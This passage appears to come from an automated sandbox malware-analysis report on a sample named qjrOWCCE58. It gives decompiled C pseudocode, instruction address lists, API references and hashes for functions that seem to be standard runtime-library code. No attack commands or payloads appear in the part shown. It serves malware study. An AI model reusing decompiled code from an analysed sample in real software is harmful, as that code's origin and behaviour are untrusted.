					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E0040D3AF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x0041ef96
0x0041ef9d
0x0041efa0
0x0041efa8
0x0041efab
0x0041efb8
0x0041efbb
0x0041efbe
0x0041efc5
0x0041efcd
0x0041efd0
0x0041efd3
0x0041efd9
0x0041efdb
0x0041efe2
0x0041efec
0x0041efee
0x0041eff1
0x0041eff4
0x0041eff7
0x0041effa
0x0041effd
0x0041f003
0x0041f30e
0x0041f30e
0x00000000
0x0041f009
0x0041f011
0x0041f014
0x0041f01a
0x0041f01d
0x0041f024
0x0041f02b
0x0041f02e
0x00000000
0x00000000
0x0041f037
0x0041f03c
0x0041f03e
0x0041f041
0x0041f046
0x0041f04a
0x00000000
0x00000000
0x00000000
0x0041f04a
0x0041f04f
0x0041f051
0x0041f056
0x0041f110
0x0041f117
0x0041f118
0x0041f11b
0x0041f11d
0x0041f2c1
0x0041f2c3
0x00000000
0x0041f2c5
0x0041f2c5
0x0041f2c8
0x0041f2d7
0x0041f2db
0x0041f2dc
0x0041f2dc
0x00000000
0x0041f2e0
0x0041f123
0x0041f125
0x0041f12b
0x0041f12e
0x0041f13a
0x0041f143
0x0041f14e
0x0041f153
0x0041f156
0x0041f159
0x00000000
0x0041f15f
0x0041f15f
0x00000000
0x0041f15f
0x0041f159
0x0041f05c
0x0041f06b
0x0041f06c
0x0041f06f
0x0041f072
0x0041f077
0x0041f28d
0x0041f28f
0x0041f291
0x0041f293
0x0041f29d
0x0041f2a5
0x0041f2a7
0x0041f2a8
0x0041f2ac
0x0041f2af
0x0041f2af
0x0041f2b3
0x0041f2b3
0x0041f2b3
0x0041f2b6
0x0041f2b6
0x0041f2b6
0x0041f2b8
0x0041f2b8
0x0041f2bc
0x0041f07d
0x0041f07d
0x0041f080
0x0041f082
0x0041f085
0x0041f088
0x0041f08c
0x0041f08d
0x0041f091
0x0041f094
0x0041f099
0x0041f0a3
0x0041f0a8
0x0041f0ab
0x0041f0ae
0x0041f0ae
0x0041f0b1
0x0041f0b4
0x0041f0b6
0x0041f0bf
0x0041f0c3
0x0041f0c4
0x0041f0c8
0x0041f0ce
0x0041f0d7
0x0041f0e4
0x0041f0eb
0x0041f0ef
0x0041f0fa
0x0041f0ff
0x0041f105
0x00000000
0x0041f10b
0x0041f162
0x0041f163
0x0041f1e6
0x0041f1ed
0x0041f1f5
0x0041f1fd
0x0041f202
0x0041f205
0x0041f20a
0x00000000
0x0041f210
0x0041f225
0x0041f305
0x0041f30b
0x00000000
0x0041f22b
0x0041f234
0x0041f236
0x0041f23c
0x00000000
0x0041f242
0x0041f246
0x0041f27c
0x0041f27f
0x00000000
0x0041f285
0x0041f285
0x00000000
0x0041f285
0x0041f248
0x0041f24a
0x0041f24c
0x0041f265
0x00000000
0x0041f26b
0x0041f26f
0x00000000
0x0041f275
0x0041f275
0x0041f278
0x0041f279
0x00000000
0x0041f279
0x0041f26f
0x0041f265
0x0041f246
0x0041f23c
0x0041f225
0x0041f20a
0x0041f105
0x0041f077
0x00000000
0x0041f167
0x0041f167
0x0041f16b
0x0041f16e
0x0041f190
0x0041f193
0x0041f198
0x0041f19c
0x0041f1a0
0x0041f1ce
0x0041f1d0
0x00000000
0x0041f1a2
0x0041f1a2
0x0041f1a2
0x0041f1a5
0x0041f1a8
0x0041f1ab
0x0041f2e2
0x0041f2e5
0x0041f2e8
0x0041f2f2
0x0041f2fd
0x0041f302
0x00000000
0x0041f1b1
0x0041f1b8
0x0041f1bd
0x0041f1c0
0x0041f1c3
0x00000000
0x0041f1c9
0x0041f1c9
0x00000000
0x0041f1c9
0x0041f1c3
0x0041f1ab
0x0041f170
0x0041f174
0x0041f177
0x0041f17c
0x0041f182
0x0041f184
0x0041f18b
0x0041f1d1
0x0041f1d4
0x0041f1d5
0x0041f1da
0x0041f1dd
0x0041f1e0
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f1e0
0x00000000
0x0041f16e
0x0041f009
0x0041f311
0x0041f311
0x0041f313
0x0041f316
0x0041f316
0x0041f316
0x0041f316
0x0041f328
0x0041f32a
0x0041f32b
0x0041f32c
0x0041f336

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 0041EFD3
__fassign.LIBCMT ref: 0041F1B8
__fassign.LIBCMT ref: 0041F1D5
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F21D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041F25D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F305

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: a1e784d9cb2a6f84337d6e7b30d011f19cfcde04d53d168bf4cb0a7b43334b39
Instruction ID: 9f8fcd9010b23043c2af6e38a7d942dcd3c8084aa4a2f211d23b8fa1e122c498
Opcode Fuzzy Hash: a1e784d9cb2a6f84337d6e7b30d011f19cfcde04d53d168bf4cb0a7b43334b39
Instruction Fuzzy Hash: 59C19D75D002589FCB15CFE8C8809EDBBB5AF48314F28416AE815FB342D6359D86CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0083F1F2 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 0083F23A
__fassign.LIBCMT ref: 0083F41F
__fassign.LIBCMT ref: 0083F43C
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0083F484
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0083F4C4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0083F56C

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 021adb45aea81aa216f3154be5cd5ca8c397c297e29d4e364980dd2082ff9a62
Instruction ID: fe4d2946bd64e359aa761f2d2169030ff7258a46a345f5ecddce0b97cc999e3a
Opcode Fuzzy Hash: 021adb45aea81aa216f3154be5cd5ca8c397c297e29d4e364980dd2082ff9a62
Instruction Fuzzy Hash: 94C18C75D002589FCF15CFA8D8809EDBBB5FF88314F28416AE915F7242D631AA46CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0082D42C Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0082D475
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0082D4E0
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0082D4FD
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0082D53C
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0082D59B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0082D5BE

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: effcc710a656f93cc95e1f8aa272300e083ebe00c57372196579f2b5a2d11680
Instruction ID: c4732f50f87c20aa75a0b1a003c69604548ab2cf044146e6c53e3e21d1ebb3d7
Opcode Fuzzy Hash: effcc710a656f93cc95e1f8aa272300e083ebe00c57372196579f2b5a2d11680
Instruction Fuzzy Hash: 8C51BC7260032AABEB209FA4EC45FAA3FA9FB54748F104125F905D6190DB74DD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90 Relevance: 9.1, APIs: 6, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040AE90(intOrPtr __edx) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				char _v68;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t41;
				intOrPtr* _t44;
				intOrPtr _t48;
				intOrPtr _t50;
				void* _t57;
				signed int _t62;
				signed int _t63;
				void* _t64;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t81;
				void* _t82;
				intOrPtr* _t84;
				intOrPtr* _t85;
				void* _t86;
				void* _t91;
				signed int _t94;
				void* _t102;

				_t79 = __edx;
				_t64 = _t91;
				_t94 = (_t91 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t64 + 4));
				_t89 = _t94;
				_push(0xffffffff);
				_push(0x42b284);
				_push( *[fs:0x0]);
				_push(_t64);
				_t40 =  *0x43b054; // 0x41d6575c
				_t41 = _t40 ^ _t94;
				_v32 = _t41;
				_push(_t41);
				 *[fs:0x0] =  &_v24;
				_t84 =  *((intOrPtr*)(_t64 + 8));
				_v36 = _t84;
				E0040C893( &_v44, 0);
				_v16 = 0;
				_t81 =  *0x43c0b0; // 0x1
				_t44 =  *0x43cd08; // 0x58ca90
				_v48 = _t44;
				if(_t81 == 0) {
					E0040C893( &_v40, _t81);
					_t102 =  *0x43c0b0 - _t81; // 0x1
					if(_t102 == 0) {
						_t62 =  *0x43c098; // 0x1
						_t63 = _t62 + 1;
						 *0x43c098 = _t63;
						 *0x43c0b0 = _t63;
					}
					E0040C8EB( &_v40);
					_t81 =  *0x43c0b0; // 0x1
				}
				_t66 =  *((intOrPtr*)(_t84 + 4));
				if(_t81 >=  *((intOrPtr*)(_t66 + 0xc))) {
					_t85 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t66 + 0x14)) == 0) {
						L11:
						if(_t85 != 0) {
							L19:
							E0040C8EB( &_v44);
							 *[fs:0x0] = _v24;
							_pop(_t82);
							_pop(_t86);
							return E0040D3AF(_t85, _t64, _v32 ^ _t89, _t79, _t82, _t86);
						}
						L12:
						_t48 = _v48;
						if(_t48 == 0) {
							_t85 = E0040D5BF(_t81, _t85, __eflags, 0x18);
							_v48 = _t85;
							_v16 = 1;
							_t73 =  *((intOrPtr*)(_v36 + 4));
							__eflags = _t73;
							if(_t73 == 0) {
								_t50 = 0x4379e7;
							} else {
								_t50 =  *((intOrPtr*)(_t73 + 0x18));
								__eflags = _t50;
								if(_t50 == 0) {
									_t50 = _t73 + 0x1c;
								}
							}
							E004037F0(_t50);
							 *((intOrPtr*)(_t85 + 4)) = 0;
							 *_t85 = 0x42cee4;
							E0040CE6F(_t81, _t85, __eflags,  &_v68);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							E004038A0( &_v120);
							_v36 = _t85;
							_v16 = 2;
							E0040CA44(__eflags, _t85);
							_t79 =  *_t85;
							 *((intOrPtr*)( *_t85 + 4))();
							 *0x43cd08 = _t85;
						} else {
							_t85 = _t48;
						}
						goto L19;
					}
					_t57 = E0040CA70();
					if(_t81 >=  *((intOrPtr*)(_t57 + 0xc))) {
						goto L12;
					}
					_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) + _t81 * 4));
					goto L11;
				}
				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 8)) + _t81 * 4));
				if(_t85 != 0) {
					goto L19;
				}
				goto L8;
			}

0x0040ae90
0x0040ae91
0x0040ae99
0x0040aea0
0x0040aea4
0x0040aea6
0x0040aea8
0x0040aeb3
0x0040aeb4
0x0040aeb8
0x0040aebd
0x0040aebf
0x0040aec4
0x0040aec8
0x0040aece
0x0040aed6
0x0040aed9
0x0040aede
0x0040aee5
0x0040aeeb
0x0040aef0
0x0040aef5
0x0040aefb
0x0040af00
0x0040af06
0x0040af08
0x0040af0d
0x0040af0e
0x0040af13
0x0040af13
0x0040af1b
0x0040af20
0x0040af20
0x0040af26
0x0040af2c
0x0040af3e
0x0040af3e
0x0040af40
0x0040af44
0x0040af56
0x0040af58
0x0040afe5
0x0040afe8
0x0040aff2
0x0040affa
0x0040affb
0x0040b00c
0x0040b00c
0x0040af5e
0x0040af5e
0x0040af63
0x0040af70
0x0040af75
0x0040af78
0x0040af7f
0x0040af82
0x0040af84
0x0040af92
0x0040af86
0x0040af86
0x0040af89
0x0040af8b
0x0040af8d
0x0040af8d
0x0040af8b
0x0040af9b
0x0040afa3
0x0040afab
0x0040afb1
0x0040afbc
0x0040afbf
0x0040afc3
0x0040afc8
0x0040afcc
0x0040afd0
0x0040afd5
0x0040afdc
0x0040afdf
0x0040af65
0x0040af65
0x0040af65
0x00000000
0x0040af63
0x0040af46
0x0040af4e
0x00000000
0x00000000
0x0040af53
0x00000000
0x0040af53
0x0040af31
0x0040af36
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040AED9
std::_Lockit::_Lockit.LIBCPMT ref: 0040AEFB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040AF1B
__Getctype.LIBCPMT ref: 0040AFB1
std::_Facet_Register.LIBCPMT ref: 0040AFD0
std::_Lockit::~_Lockit.LIBCPMT ref: 0040AFE8

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 3ebba0ebb1d3b28b82617adecb99c91f3f850ce10ea8435dedbad83465121f65
Instruction ID: f8d2e0115e5bdc6fe7d26da7093ed39c47ca45ca36e76d4b159b2428e95e156d
Opcode Fuzzy Hash: 3ebba0ebb1d3b28b82617adecb99c91f3f850ce10ea8435dedbad83465121f65
Instruction Fuzzy Hash: AA418CB1904205CFCB14DF58D981BAAB7B4EF44718F14827EE805BB391DB38AD05CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D909 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041D909(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, char _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				_t4 =  &_a36; // 0x41302e
				 *_t177 = 0;
				E00411E11( &_v60, _t163,  *_t4);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t18 = _t177 + 1; // 0x2
							_t165 = _t18;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t26 =  &(_t165[0]); // 0x2
								_t178 = _t26;
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E0042A710( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E0041E124(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t50 = _t178 - 1; // 0x2
									_t118 = _t50;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E0040F2F0(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E0042A710( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E0042A610();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E0042A610();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E0042A610();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E0041DC18(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E0042A7C0(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E00411DE1(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E00411D07();
				goto L66;
			}

0x0041d909
0x0041d914
0x0041d919
0x0041d91b
0x0041d91b
0x0041d91f
0x0041d925
0x0041d928
0x0041d92a
0x0041d92f
0x0041d932
0x0041d935
0x0041d94b
0x0041d94e
0x0041d953
0x0041d95d
0x0041d962
0x0041d9b9
0x0041d9bb
0x0041d9ca
0x0041d9cd
0x0041d9cd
0x0041d9d0
0x0041d9d2
0x0041d9d9
0x0041d9eb
0x0041d9ee
0x0041d9f3
0x0041d9f7
0x0041d9f8
0x0041da18
0x0041da1b
0x0041da1b
0x0041da1b
0x0041da1d
0x0041da1d
0x0041da1d
0x0041da20
0x0041da23
0x0041da25
0x0041da36
0x0041da27
0x0041da27
0x0041da27
0x0041da38
0x0041da3d
0x0041da3d
0x0041da42
0x0041da45
0x0041da4f
0x0041da51
0x0041da53
0x0041da58
0x0041da59
0x0041da5c
0x0041da5f
0x0041da62
0x0041da62
0x0041da64
0x00000000
0x00000000
0x0041da7b
0x0041da82
0x0041da86
0x0041da89
0x0041da8c
0x0041da8e
0x0041da8e
0x0041da8e
0x0041da94
0x0041da97
0x0041da9b
0x0041da9d
0x0041daa1
0x0041daa4
0x0041daa7
0x0041daa8
0x0041daab
0x0041daae
0x0041dab1
0x0041dab1
0x0041dab6
0x0041dab9
0x0041dabc
0x00000000
0x00000000
0x0041dac5
0x0041daca
0x0041dacd
0x0041dacf
0x00000000
0x00000000
0x0041dad3
0x0041dad3
0x0041dad6
0x0041dad7
0x0041dad7
0x0041dad9
0x0041dadc
0x00000000
0x00000000
0x0041dade
0x0041dae1
0x0041dae8
0x0041daeb
0x0041daee
0x0041db03
0x0041db03
0x0041db03
0x0041daf0
0x0041daf0
0x0041daf3
0x0041dafd
0x0041dafd
0x0041daf5
0x0041daf8
0x0041daf8
0x0041daff
0x0041daff
0x00000000
0x0041daee
0x0041dae3
0x0041dae3
0x0041dae5
0x0041dae5
0x0041da47
0x0041da47
0x0041da49
0x0041db06
0x0041db06
0x0041db08
0x0041db0a
0x0041db0d
0x0041db0e
0x0041db0f
0x0041db10
0x0041db18
0x0041db18
0x0041db1a
0x0041db1a
0x0041db1d
0x0041db20
0x0041db23
0x0041db25
0x0041db27
0x0041db27
0x0041db34
0x0041db3b
0x0041db42
0x0041db44
0x0041db4d
0x0041db4d
0x0041db50
0x0041db52
0x0041db55
0x0041db58
0x0041db64
0x0041db64
0x0041db68
0x0041db6b
0x0041db6d
0x00000000
0x0041db5a
0x0041db5a
0x0041db60
0x0041db60
0x0041db6e
0x0041db6e
0x0041db71
0x0041db75
0x0041db76
0x0041db78
0x0041db7a
0x0041db7c
0x0041dba6
0x0041dba6
0x0041dba8
0x0041dbb5
0x0041dbb5
0x0041dbb6
0x0041dbb7
0x0041dbb9
0x0041dbbb
0x0041dbc0
0x0041dbc2
0x0041dbc6
0x0041dbc9
0x0041dbcc
0x0041dbce
0x0041dbcf
0x0041dbcf
0x0041dbd1
0x0041dbd1
0x0041dbd3
0x0041dbe0
0x0041dbe0
0x0041dbe1
0x0041dbe2
0x0041dbe4
0x0041dbe5
0x0041dbe6
0x0041dbef
0x0041dbf2
0x0041dbf4
0x0041dbf5
0x0041dbf5
0x0041dbf7
0x0041dbf7
0x0041dbf7
0x0041dbfa
0x0041dbfc
0x0041dbff
0x0041dc01
0x0041dc07
0x0041dc0c
0x0041dc0c
0x0041dc17
0x0041dc17
0x0041dbd5
0x0041dbd7
0x00000000
0x00000000
0x0041dbd9
0x00000000
0x00000000
0x0041dbdb
0x0041dbde
0x00000000
0x00000000
0x00000000
0x0041dbde
0x0041dbaa
0x0041dbac
0x00000000
0x00000000
0x0041dbae
0x00000000
0x00000000
0x0041dbb0
0x0041dbb3
0x00000000
0x00000000
0x00000000
0x0041dbb3
0x0041db7e
0x0041db83
0x0041db89
0x0041db89
0x0041db8a
0x0041db8b
0x0041db8c
0x0041db8e
0x0041db93
0x0041db95
0x0041db97
0x0041db9c
0x0041db9f
0x0041dba1
0x0041dba4
0x0041dba4
0x00000000
0x0041dba4
0x0041db85
0x0041db87
0x00000000
0x00000000
0x00000000
0x0041db87
0x0041db5c
0x0041db5e
0x00000000
0x00000000
0x00000000
0x0041db5e
0x0041db58
0x00000000
0x0041da49
0x0041da45
0x0041d9fa
0x0041da06
0x0041da06
0x0041da08
0x0041da0f
0x00000000
0x0041da0f
0x0041da0a
0x00000000
0x0041da0a
0x0041d9bd
0x0041d9c3
0x0041d9c3
0x0041d9c6
0x0041d9c6
0x0041d9c7
0x00000000
0x0041d9c7
0x0041d9bf
0x0041d9c1
0x00000000
0x00000000
0x00000000
0x0041d9c1
0x0041d97f
0x0041d984
0x0041d986
0x0041d993
0x0041d99a
0x0041d99c
0x0041d9a7
0x0041d9a7
0x0041d9aa
0x0041d9ac
0x0041d9ac
0x0041d9b0
0x0041d988
0x0041d988
0x0041d988
0x00000000
0x0041d986
0x0041d937
0x0041d93e
0x0041d93f
0x0041d941
0x00000000

APIs

_strrchr.LIBCMT ref: 0041D993

Strings

.0A, xrefs: 0041D925

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: .0A
API String ID: 3213747228-319812877
Opcode ID: 666d1fca7fc551800c5f7099e7c6ff3dc46109fc598f1019b727dd8204721721
Instruction ID: 3b679f708dc1c95a37baab44bdbdb8d0155a355d34211ebdf76b40f0cf35b9aa
Opcode Fuzzy Hash: 666d1fca7fc551800c5f7099e7c6ff3dc46109fc598f1019b727dd8204721721
Instruction Fuzzy Hash: E5B124B2E082459FDB11CF28C881BEFBBB5EF45344F25416BE845AB341D2389D82C769

Uniqueness

